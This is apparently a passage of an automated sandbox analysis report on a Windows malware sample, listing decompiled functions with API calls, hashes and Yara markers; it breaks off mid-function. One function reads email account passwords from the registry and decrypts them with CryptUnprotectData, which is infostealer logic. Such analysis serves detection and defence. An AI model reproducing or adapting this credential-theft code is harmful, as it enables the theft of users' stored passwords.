                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CountSleepTick
                                  • String ID:
                                  • API String ID: 2804873075-0
                                  • Opcode ID: 62ba6aea4ccaa183db535f1184d9731aabb142e05b2b2deef58fc80dffe5c418
                                  • Instruction ID: cb4e42e87864ed722aedde75ee5ec1912828b431a3830261680a48f961af466f
                                  • Opcode Fuzzy Hash: 62ba6aea4ccaa183db535f1184d9731aabb142e05b2b2deef58fc80dffe5c418
                                  • Instruction Fuzzy Hash: EDD0123035C104AFE30C9B59FC5E7A57A6ED7D5705F04C03BF60EC92E1C9B195554598
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004117A2, Relevance: 3.0, APIs: 2, Instructions: 8synchronizationCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004117A2(void** __ecx) {
				int _t2;
				void** _t4;

				_t4 = __ecx;
				ReleaseMutex( *__ecx);
				_t2 = CloseHandle( *_t4); // executed
				return _t2;
			}





                                  0x004117a3
                                  0x004117a7
                                  0x004117af
                                  0x004117b6

                                  APIs
                                  • ReleaseMutex.KERNEL32(?,?,0041141C,.VA,00405D32,.VA,00000000,00000000,00000000,00000000,?,?,?,?,00000000,.bss), ref: 004117A7
                                  • CloseHandle.KERNEL32(?), ref: 004117AF
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandleMutexRelease
                                  • String ID:
                                  • API String ID: 4207627910-0
                                  • Opcode ID: 9070c27b8a4b9f148fcf1c292b5093e63aa80bcd4563dcd4d2d625aad2e24fc1
                                  • Instruction ID: da85866315e866d9b3d8c4bbf16f7db246e1d0e2a6d46926b2ed1ada722145db
                                  • Opcode Fuzzy Hash: 9070c27b8a4b9f148fcf1c292b5093e63aa80bcd4563dcd4d2d625aad2e24fc1
                                  • Instruction Fuzzy Hash: FFB0923A009020EFEB222F14FC0C8C4BBB5EF0925131185BAF08182138CBB20C519B94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401085, Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00401085(long _a4) {
				void* _t3;

				_t3 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
				return _t3;
			}




                                  0x00401092
                                  0x00401098

                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                  • RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcess
                                  • String ID:
                                  • API String ID: 1357844191-0
                                  • Opcode ID: 361bd0a745674208a41a1b438dab8da89b21d4b91da0fe10cf2071da8b51176b
                                  • Instruction ID: edbd1dd06743cb7a1a2c428d36d16fad14126cf83079969d3a169869f5bf1203
                                  • Opcode Fuzzy Hash: 361bd0a745674208a41a1b438dab8da89b21d4b91da0fe10cf2071da8b51176b
                                  • Instruction Fuzzy Hash: 06B00275558200ABDE516BA09F0DB597A75AB48702F048594B24585060C77544519B66
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00414C38, Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 87%
                                  			E00414C38(void* __ecx) {
				void* _t22;
				intOrPtr* _t32;
				intOrPtr* _t33;
				intOrPtr* _t34;
				intOrPtr* _t37;
				void* _t42;

				_t42 = __ecx;
				_t32 =  *((intOrPtr*)(__ecx + 0x34));
				if(_t32 != 0) {
					 *((intOrPtr*)( *_t32 + 0x24))(_t32);
				}
				_t33 =  *((intOrPtr*)(_t42 + 0x34));
				if(_t33 != 0) {
					 *((intOrPtr*)( *_t33 + 8))(_t33);
					 *((intOrPtr*)(_t42 + 0x34)) = 0;
				}
				_t34 =  *((intOrPtr*)(_t42 + 0x18));
				if(_t34 != 0) {
					 *((intOrPtr*)( *_t34 + 8))(_t34);
					 *((intOrPtr*)(_t42 + 0x18)) = 0;
				}
				E00402562(_t42 + 0x1c);
				E00402562(_t42 + 0x20);
				_t37 =  *((intOrPtr*)(_t42 + 0x24));
				if(_t37 != 0) {
					 *((intOrPtr*)( *_t37 + 8))(_t37);
					 *((intOrPtr*)(_t42 + 0x24)) = 0;
				}
				E00402562(_t42 + 0x28);
				E00402562(_t42 + 0x2c);
				_t22 = E00402562(_t42 + 0x30);
				 *((intOrPtr*)(_t42 + 0x34)) = 0;
				__imp__CoUninitialize(); // executed
				return _t22;
			}









                                  0x00414c39
                                  0x00414c3c
                                  0x00414c41
                                  0x00414c46
                                  0x00414c46
                                  0x00414c49
                                  0x00414c50
                                  0x00414c55
                                  0x00414c58
                                  0x00414c58
                                  0x00414c5b
                                  0x00414c60
                                  0x00414c65
                                  0x00414c68
                                  0x00414c68
                                  0x00414c6e
                                  0x00414c76
                                  0x00414c7b
                                  0x00414c80
                                  0x00414c85
                                  0x00414c88
                                  0x00414c88
                                  0x00414c8e
                                  0x00414c96
                                  0x00414c9e
                                  0x00414ca3
                                  0x00414ca6
                                  0x00414cae

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Uninitialize
                                  • String ID:
                                  • API String ID: 3861434553-0
                                  • Opcode ID: f409e6eadb3aaa3bb9f8bd5a13b75d6ab8235dd759573a421781aaf34dc19ad9
                                  • Instruction ID: 5160318e26e57bbb59a4e031077ca80efc8ba31f4ff7defc0b7589d9c5b86bff
                                  • Opcode Fuzzy Hash: f409e6eadb3aaa3bb9f8bd5a13b75d6ab8235dd759573a421781aaf34dc19ad9
                                  • Instruction Fuzzy Hash: DC012E752027008BC328DF36C698866B7F4BF94700301092EA48787AA1DB35F941CA48
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004032E6, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004032E6(WCHAR** __ecx, WCHAR** __edx, void* __eflags) {
				short _v1028;
				WCHAR** _t14;
				WCHAR** _t15;

				_t15 = __edx;
				_t14 = __ecx;
				E00401052( &_v1028, 0, 0x400);
				ExpandEnvironmentStringsW( *_t15,  &_v1028, 0x1ff);
				E004036F7(_t14,  &_v1028); // executed
				return _t14;
			}






                                  0x004032ff
                                  0x00403301
                                  0x00403303
                                  0x00403319
                                  0x00403328
                                  0x00403332

                                  APIs
                                  • ExpandEnvironmentStringsW.KERNEL32(?,?,000001FF), ref: 00403319
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$EnvironmentExpandStringslstrcpy
                                  • String ID:
                                  • API String ID: 1709970682-0
                                  • Opcode ID: 7b1ab6c01e49d58df192e51cc805c7a5d7486070a1782082588882e62a7bfd3e
                                  • Instruction ID: c9e9bc113a16d457794ea73b6dea9160bc4569d11f418ada23e118eebf44067f
                                  • Opcode Fuzzy Hash: 7b1ab6c01e49d58df192e51cc805c7a5d7486070a1782082588882e62a7bfd3e
                                  • Instruction Fuzzy Hash: E9E048B670015967DB30A6169C06FD6776DDBC471CF0400B9B709F21D0E975DA06C6A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405A23, Relevance: 1.5, APIs: 1, Instructions: 23networkCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 58%
                                  			E00405A23(void* __ecx, void* __eflags) {

				E004032D5(__ecx);
				 *((intOrPtr*)(__ecx + 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0x14)) = 0;
				 *((intOrPtr*)(__ecx + 0x30)) = 0;
				 *((intOrPtr*)(__ecx + 0x34)) = 0;
				E004117B7(__ecx + 0x1d8, __ecx);
				__imp__#115(2, __ecx + 0x38); // executed
				 *(__ecx + 0xc) =  *(__ecx + 0xc) | 0xffffffff;
				 *((intOrPtr*)(__ecx + 0x18)) = 0;
				 *((intOrPtr*)(__ecx + 0x24)) = 0;
				return __ecx;
			}



                                  0x00405a27
                                  0x00405a2e
                                  0x00405a31
                                  0x00405a3b
                                  0x00405a3e
                                  0x00405a41
                                  0x00405a4c
                                  0x00405a52
                                  0x00405a58
                                  0x00405a5b
                                  0x00405a60

                                  APIs
                                    • Part of subcall function 004117B7: CreateMutexA.KERNEL32(00000000,00000000,00000000,?,004113FD,?,?,00411978,?,74A313FB,00000000,00405B72), ref: 004117BF
                                  • WSAStartup.WS2_32(00000002,?), ref: 00405A4C
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CreateMutexStartup
                                  • String ID:
                                  • API String ID: 3730780901-0
                                  • Opcode ID: 8fc4056cf67e8e1589ff72f7a35a52cbe4d60c4a23f4d9fffcf1e601f2432e09
                                  • Instruction ID: 2a260520f2afbb8a1e0ca9aeaaef8dbe40d0ee1d54cebc48408a6e1b33bc0553
                                  • Opcode Fuzzy Hash: 8fc4056cf67e8e1589ff72f7a35a52cbe4d60c4a23f4d9fffcf1e601f2432e09
                                  • Instruction Fuzzy Hash: 8DE03971500B008BC270AF2B9945893FBF8FF907207000A1FE5A682AA0C7B0B1048B54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004112C4, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004112C4(intOrPtr* __ecx, CHAR** _a4) {
				intOrPtr* _t10;

				_t10 = __ecx;
				E00403237(__ecx + 4, _a4); // executed
				 *_t10 = CreateEventA(0, 1, 0,  *(_t10 + 4));
				return 1;
			}




                                  0x004112cc
                                  0x004112d1
                                  0x004112e5
                                  0x004112ed

                                  APIs
                                    • Part of subcall function 00403237: lstrcatA.KERNEL32(00000000,74A313FB,?,00000000,?,004036D6,00000000,00000000,?,00404FB1,?,?,?,?,?,00000000), ref: 00403263
                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,?,?), ref: 004112DF
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CreateEventlstrcat
                                  • String ID:
                                  • API String ID: 2275612694-0
                                  • Opcode ID: 6d37ef84c37783529fc4d2debaab04c5f689fd435ec9aa43ab3e61700c21c811
                                  • Instruction ID: 39468192288ec31cf53fa38ac828197baabee26d9983865f2de3b863843106a1
                                  • Opcode Fuzzy Hash: 6d37ef84c37783529fc4d2debaab04c5f689fd435ec9aa43ab3e61700c21c811
                                  • Instruction Fuzzy Hash: 7CD02E322082017BD700AF91DC02F92BF29EB50760F008036F24882180CBB1A020C790
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004117B7, Relevance: 1.5, APIs: 1, Instructions: 15synchronizationCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004117B7(void** __ecx) {
				void* _t5;
				void** _t10;

				_t10 = __ecx;
				_t5 = CreateMutexA(0, 0, 0); // executed
				 *_t10 = _t5;
				_t10[1] = 0 | _t5 != 0xffffffff;
				return _t10;
			}





                                  0x004117ba
                                  0x004117bf
                                  0x004117c7
                                  0x004117d1
                                  0x004117d5

                                  APIs
                                  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,004113FD,?,?,00411978,?,74A313FB,00000000,00405B72), ref: 004117BF
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CreateMutex
                                  • String ID:
                                  • API String ID: 1964310414-0
                                  • Opcode ID: 9b62faa460be2adddf2a4740bf86999dfbec1966c7ca0747a50593f43ad6b7fc
                                  • Instruction ID: d1f17f3edcdec86f78565eb2beadc44be2d21716b89def248c0870d2ffc3ae74
                                  • Opcode Fuzzy Hash: 9b62faa460be2adddf2a4740bf86999dfbec1966c7ca0747a50593f43ad6b7fc
                                  • Instruction Fuzzy Hash: 72D012F15045206FA3249F395C088A775DDDF98730315CF39B4A5C72D4E5308C808760
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410C3E, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                  Download Yara Rule
                                  APIs
                                  • SHCreateDirectoryExW.SHELL32(00000000,?,00000000), ref: 00410C44
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CreateDirectory
                                  • String ID:
                                  • API String ID: 4241100979-0
                                  • Opcode ID: 9a991b3da34938619209aa850904dd2585657d0af3bfd830ffa1374368b66a4b
                                  • Instruction ID: bf7d7d0385146835833033b658300741a11cd90afef40312a0121630c5b8194d
                                  • Opcode Fuzzy Hash: 9a991b3da34938619209aa850904dd2585657d0af3bfd830ffa1374368b66a4b
                                  • Instruction Fuzzy Hash: 7AB012303E82005BDE101B708C06F103520A712B07F2001B0B112C90E0C66100065504
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405F68, Relevance: 1.3, APIs: 1, Instructions: 17memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00405F68(long __ecx) {
				void* _t1;
				long _t7;
				void* _t8;

				_t7 = __ecx;
				_t1 = VirtualAlloc(0, __ecx, 0x3000, 4); // executed
				_t8 = _t1;
				E00406077(_t8, _t7);
				return _t8;
			}






                                  0x00405f71
                                  0x00405f76
                                  0x00405f7c
                                  0x00405f81
                                  0x00405f8b

                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,004034F4,?,00405B8D,.bss,00000000), ref: 00405F76
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: f1a7ba58f94a8befa6630eb27b5e9bf87aed46268b93f7419a6681cf929e3ed4
                                  • Instruction ID: e48ffaa35cf7c95941dea0d5a44f438d870c849a0c4b6b129c3fdc7458d1fa28
                                  • Opcode Fuzzy Hash: f1a7ba58f94a8befa6630eb27b5e9bf87aed46268b93f7419a6681cf929e3ed4
                                  • Instruction Fuzzy Hash: 58C012223482602AE124111A7C1AF5B9DACCBC1FB1F01002FF6059A2D0D9D00C0181A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00409733, Relevance: 1.3, APIs: 1, Instructions: 9COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00409733(void* __eax, void* __ecx) {
				int _t3;
				void* _t5;

				_t5 =  *(__ecx + 0x10);
				if(_t5 != 0) {
					_t3 = VirtualFree(_t5, 0, 0x8000); // executed
					return _t3;
				} else {
					return __eax;
				}
			}





                                  0x00409733
                                  0x00409738
                                  0x00405ff3
                                  0x00405ff9
                                  0x0040973e
                                  0x0040973e
                                  0x0040973e

                                  APIs
                                  • VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FreeVirtual
                                  • String ID:
                                  • API String ID: 1263568516-0
                                  • Opcode ID: 9bc93bb1a3698aea7ee270b90f1be36fa01f6a0388a93eaf891ae68bb0364329
                                  • Instruction ID: d77e01f5aa36a87b39216e07334d8eada759ddd446e76f586daee25b3cfe99bb
                                  • Opcode Fuzzy Hash: 9bc93bb1a3698aea7ee270b90f1be36fa01f6a0388a93eaf891ae68bb0364329
                                  • Instruction Fuzzy Hash: F8B0923438070157EE2CDB208C55F6A2220BB80B05FA089ACB102AA1D08AB9E4028A08
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405FFA, Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00405FFA(long __ecx) {
				void* _t1;

				_t1 = VirtualAlloc(0, __ecx, 0x3000, 4); // executed
				return _t1;
			}




                                  0x00406004
                                  0x0040600a

                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00403764,?,?,?,00412AE3,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?VA,00000000,74A313FB,00000000), ref: 00406004
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 03a753f4e56950697ff4e71072d1805ec65d3fd45af3395555f01cc7733772b7
                                  • Instruction ID: d603def4ad70c1049ddec86c054817805532c4fd5811fc6e80ce733ca9b25ee4
                                  • Opcode Fuzzy Hash: 03a753f4e56950697ff4e71072d1805ec65d3fd45af3395555f01cc7733772b7
                                  • Instruction Fuzzy Hash: 40A002B07D93047EFD6997509D1FF553D68A744F16F604154B3096D0D0A5E02500C52D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405FEB, Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00405FEB(void* __ecx) {
				int _t1;

				_t1 = VirtualFree(__ecx, 0, 0x8000); // executed
				return _t1;
			}




                                  0x00405ff3
                                  0x00405ff9

                                  APIs
                                  • VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FreeVirtual
                                  • String ID:
                                  • API String ID: 1263568516-0
                                  • Opcode ID: 7c6eb06f239127f0dcae98b16747e067cbb9817e51cb8f59be5681c4efa5b6de
                                  • Instruction ID: a4afafc7f9fbe744b945ffb19ace319cc8b7579b2679098b8a9567e0cb6a054f
                                  • Opcode Fuzzy Hash: 7c6eb06f239127f0dcae98b16747e067cbb9817e51cb8f59be5681c4efa5b6de
                                  • Instruction Fuzzy Hash: E6A002706D470066ED7457605D4AF4526247740B51F208A947241A80E08AF5A0458A5C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Function 004099FF, Relevance: 31.8, APIs: 9, Strings: 9, Instructions: 296registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 98%
                                  			E004099FF(void* __ecx, void* __edx, void* __eflags, void* _a4) {
				int _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v292;
				char _v556;
				char _v820;
				char _v9012;
				char _v17204;
				long _t124;
				long _t130;
				long _t136;
				long _t142;
				void* _t180;
				void* _t181;
				void* _t199;
				void* _t207;
				void* _t208;
				void* _t209;
				void* _t210;
				void* _t211;
				void* _t212;
				void* _t213;
				void* _t214;
				void* _t215;
				void* _t216;
				void* _t217;

				_t199 = __edx;
				_t181 = __ecx;
				E004011C0(0x4334, __ecx);
				_v8 = 0x1000;
				_v24 = 0;
				_v20 = 0;
				_t180 = _t181;
				_v16 = 0;
				E00401052( &_v292, 0, 0x104);
				E00401052( &_v556, 0, 0x104);
				E00401052( &_v820, 0, 0x104);
				E00401052( &_v9012, 0, _v8);
				_t207 = _a4;
				_t209 = _t208 + 0x30;
				if(RegQueryValueExW(_t207, L"Account Name", 0, 0,  &_v9012,  &_v8) == 0) {
					E00403411( &_v20, _t199,  &_v9012);
				}
				_v8 = 0x1000;
				E00401052( &_v9012, 0, 0x1000);
				_t210 = _t209 + 0xc;
				if(RegQueryValueExW(_t207, L"Email", 0, 0,  &_v9012,  &_v8) == 0) {
					E00403411( &_v20, _t199,  &_v9012);
				}
				_v8 = 0x1000;
				E00401052( &_v9012, 0, 0x1000);
				_t211 = _t210 + 0xc;
				if(RegQueryValueExW(_t207, L"POP3 Server", 0, 0,  &_v9012,  &_v8) == 0) {
					E00403411( &_v24, _t199,  &_v9012);
				}
				_v8 = 0x1000;
				E00401052( &_v9012, 0, 0x1000);
				_t212 = _t211 + 0xc;
				if(RegQueryValueExW(_t207, L"POP3 User", 0, 0,  &_v9012,  &_v8) == 0) {
					E00403411( &_v20, _t199,  &_v9012);
				}
				_v8 = 0x1000;
				E00401052( &_v9012, 0, 0x1000);
				_t213 = _t212 + 0xc;
				if(RegQueryValueExW(_t207, L"SMTP Server", 0, 0,  &_v9012,  &_v8) == 0) {
					E00403411( &_v24, _t199,  &_v9012);
				}
				_v8 = 0x1000;
				E00401052( &_v9012, 0, 0x1000);
				_t214 = _t213 + 0xc;
				_t124 = RegQueryValueExW(_t207, L"POP3 Password", 0, 0,  &_v9012,  &_v8);
				_t225 = _t124;
				if(_t124 == 0) {
					E00401052( &_v17204, _t124, 0x1000);
					E00409D97( &_v9012,  &_v17204, _t225, _v8);
					_t214 = _t214 + 0x10;
					E00403411( &_v16,  &_v17204,  &_v17204);
				}
				_v8 = 0x1000;
				E00401052( &_v9012, 0, 0x1000);
				_t215 = _t214 + 0xc;
				_t130 = RegQueryValueExW(_t207, L"SMTP Password", 0, 0,  &_v9012,  &_v8);
				_t226 = _t130;
				if(_t130 == 0) {
					E00401052( &_v17204, _t130, 0x1000);
					E00409D97( &_v9012,  &_v17204, _t226, _v8);
					_t215 = _t215 + 0x10;
					E00403411( &_v16,  &_v17204,  &_v17204);
				}
				_v8 = 0x1000;
				E00401052( &_v9012, 0, 0x1000);
				_t216 = _t215 + 0xc;
				_t136 = RegQueryValueExW(_t207, L"HTTP Password", 0, 0,  &_v9012,  &_v8);
				_t227 = _t136;
				if(_t136 == 0) {
					E00401052( &_v17204, _t136, 0x1000);
					E00409D97( &_v9012,  &_v17204, _t227, _v8);
					_t216 = _t216 + 0x10;
					E00403411( &_v16,  &_v17204,  &_v17204);
				}
				_v8 = 0x1000;
				E00401052( &_v9012, 0, 0x1000);
				_t217 = _t216 + 0xc;
				_t142 = RegQueryValueExW(_t207, L"IMAP Password", 0, 0,  &_v9012,  &_v8);
				_t228 = _t142;
				if(_t142 == 0) {
					E00401052( &_v17204, _t142, 0x1000);
					E00409D97( &_v9012,  &_v17204, _t228, _v8);
					_t217 = _t217 + 0x10;
					E00403411( &_v16,  &_v17204,  &_v17204);
				}
				_v12 = 3;
				if(E00403373( &_v24) > 0) {
					E00401FF2(_t217 - 0x10,  &_v24);
					E00402028(_t180);
				}
				E00401441( &_v24);
				return 1;
			}































                                  0x004099ff
                                  0x004099ff
                                  0x00409a07
                                  0x00409a11
                                  0x00409a1d
                                  0x00409a27
                                  0x00409a2c
                                  0x00409a2e
                                  0x00409a31
                                  0x00409a3f
                                  0x00409a4d
                                  0x00409a5d
                                  0x00409a62
                                  0x00409a68
                                  0x00409a85
                                  0x00409a91
                                  0x00409a91
                                  0x00409aa1
                                  0x00409aab
                                  0x00409ab0
                                  0x00409acc
                                  0x00409ad8
                                  0x00409ad8
                                  0x00409ae3
                                  0x00409aef
                                  0x00409af4
                                  0x00409b10
                                  0x00409b1c
                                  0x00409b1c
                                  0x00409b27
                                  0x00409b33
                                  0x00409b38
                                  0x00409b54
                                  0x00409b60
                                  0x00409b60
                                  0x00409b6b
                                  0x00409b77
                                  0x00409b7c
                                  0x00409b98
                                  0x00409ba4
                                  0x00409ba4
                                  0x00409baf
                                  0x00409bbb
                                  0x00409bc0
                                  0x00409bd8
                                  0x00409bda
                                  0x00409bdc
                                  0x00409beb
                                  0x00409bff
                                  0x00409c04
                                  0x00409c11
                                  0x00409c11
                                  0x00409c1c
                                  0x00409c28
                                  0x00409c2d
                                  0x00409c45
                                  0x00409c47
                                  0x00409c49
                                  0x00409c58
                                  0x00409c6c
                                  0x00409c71
                                  0x00409c7e
                                  0x00409c7e
                                  0x00409c89
                                  0x00409c95
                                  0x00409c9a
                                  0x00409cb2
                                  0x00409cb4
                                  0x00409cb6
                                  0x00409cc5
                                  0x00409cd9
                                  0x00409cde
                                  0x00409ceb
                                  0x00409ceb
                                  0x00409cf6
                                  0x00409d02
                                  0x00409d07
                                  0x00409d1f
                                  0x00409d21
                                  0x00409d23
                                  0x00409d32
                                  0x00409d46
                                  0x00409d4b
                                  0x00409d58
                                  0x00409d58
                                  0x00409d60
                                  0x00409d6e
                                  0x00409d79
                                  0x00409d80
                                  0x00409d80
                                  0x00409d88
                                  0x00409d94

                                  APIs
                                  • RegQueryValueExW.ADVAPI32(?,Account Name,00000000,00000000,?,00001000,?,?,?,?,?,74A345DD,767130EA,00000000,?,004099C3), ref: 00409A81
                                  • RegQueryValueExW.ADVAPI32(?,Email,00000000,00000000,?,00001000,?,?,?,?,?,?,?,?,74A345DD,767130EA), ref: 00409AC8
                                  • RegQueryValueExW.ADVAPI32(?,POP3 Server,00000000,00000000,?,00001000), ref: 00409B0C
                                  • RegQueryValueExW.ADVAPI32(?,POP3 User,00000000,00000000,?,00001000), ref: 00409B50
                                  • RegQueryValueExW.ADVAPI32(?,SMTP Server,00000000,00000000,?,00001000), ref: 00409B94
                                  • RegQueryValueExW.ADVAPI32(?,POP3 Password,00000000,00000000,?,00001000), ref: 00409BD8
                                  • RegQueryValueExW.ADVAPI32(?,SMTP Password,00000000,00000000,?,00001000), ref: 00409C45
                                  • RegQueryValueExW.ADVAPI32(?,HTTP Password,00000000,00000000,?,00001000), ref: 00409CB2
                                  • RegQueryValueExW.ADVAPI32(?,IMAP Password,00000000,00000000,?,00001000), ref: 00409D1F
                                    • Part of subcall function 00409D97: GlobalAlloc.KERNEL32(00000040,-00000001,74A345FD,?,?,?,00409D4B,00001000,?,00000000,00001000), ref: 00409DB5
                                    • Part of subcall function 00409D97: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,00409D4B), ref: 00409DEB
                                    • Part of subcall function 00409D97: lstrcpyW.KERNEL32(?,Could not decrypt), ref: 00409E22
                                    • Part of subcall function 00403373: lstrlenW.KERNEL32(74A313FB,00403758,?,?,?,00412AE3,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?VA,00000000,74A313FB,00000000), ref: 0040337A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: QueryValue$AllocCryptDataGlobalUnprotectlstrcpylstrlen
                                  • String ID: Account Name$Email$HTTP Password$IMAP Password$POP3 Password$POP3 Server$POP3 User$SMTP Password$SMTP Server
                                  • API String ID: 6593746-2537589853
                                  • Opcode ID: cc5f769d671623cbfaa9f0c516c5158cd819fe66edd51a48f4d1e9d80896eb4f
                                  • Instruction ID: 7120254dbc2b6b4f3800d12c0dea7aeb6369d048fca86938223c4741ea706cc6
                                  • Opcode Fuzzy Hash: cc5f769d671623cbfaa9f0c516c5158cd819fe66edd51a48f4d1e9d80896eb4f
                                  • Instruction Fuzzy Hash: FFA11EB291011DAADB25EB91CD45FEF737CAF54744F1000BAF605F61C1EA78AB448BA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040A36F, Relevance: 28.4, APIs: 5, Strings: 11, Instructions: 406filestringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 95%
                                  			E0040A36F(intOrPtr __ecx, void* __eflags, char _a4) {
				int _v12;
				int _v16;
				WCHAR* _v20;
				WCHAR* _v24;
				char _v28;
				intOrPtr _v32;
				WCHAR* _v36;
				char _v40;
				char _v44;
				int _v48;
				int _v52;
				int _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				long _v92;
				int _v96;
				intOrPtr _v100;
				char _v104;
				char _v108;
				char _v112;
				void* _v116;
				int _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				int _v156;
				char _v160;
				intOrPtr _v164;
				char _v180;
				char _v184;
				short _v704;
				short _v1224;
				char* _t165;
				void* _t167;
				int _t189;
				int _t190;
				int _t193;
				int _t207;
				WCHAR* _t215;
				void* _t217;
				int _t221;
				void* _t230;
				void* _t236;
				void* _t242;
				int _t281;
				int _t283;
				char* _t293;
				char* _t325;
				void* _t386;
				long _t389;
				intOrPtr _t391;
				intOrPtr _t392;
				WCHAR* _t393;
				int _t394;
				void* _t395;
				void* _t396;
				void* _t397;

				_t397 = __eflags;
				_t392 = __ecx;
				_v32 = __ecx;
